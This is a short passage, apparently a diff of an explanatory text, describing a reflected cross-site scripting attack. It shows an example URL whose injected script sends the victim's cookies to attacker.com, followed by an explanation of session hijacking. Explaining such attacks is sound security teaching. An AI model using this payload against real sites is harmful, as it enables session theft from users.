 https://example.com/news?q=<script>document.location='https://attacker.com/log.php?c=' + encodeURIComponent(document.cookie)</script>

-The HTML source code, which is reflecting the attacker's malicious code redirects the victim to a website that is controlled by the attacker, which can then record the user's current cookie for example.com as GET parameter.
+<script> HTML tag containing the attacker’s malicious code redirects the victim’s browser to a website controlled by the attacker to read the current cookie values, including session cookies for

 example.com (session tokens).
 This opens the way to a variety of session hijacking attacks.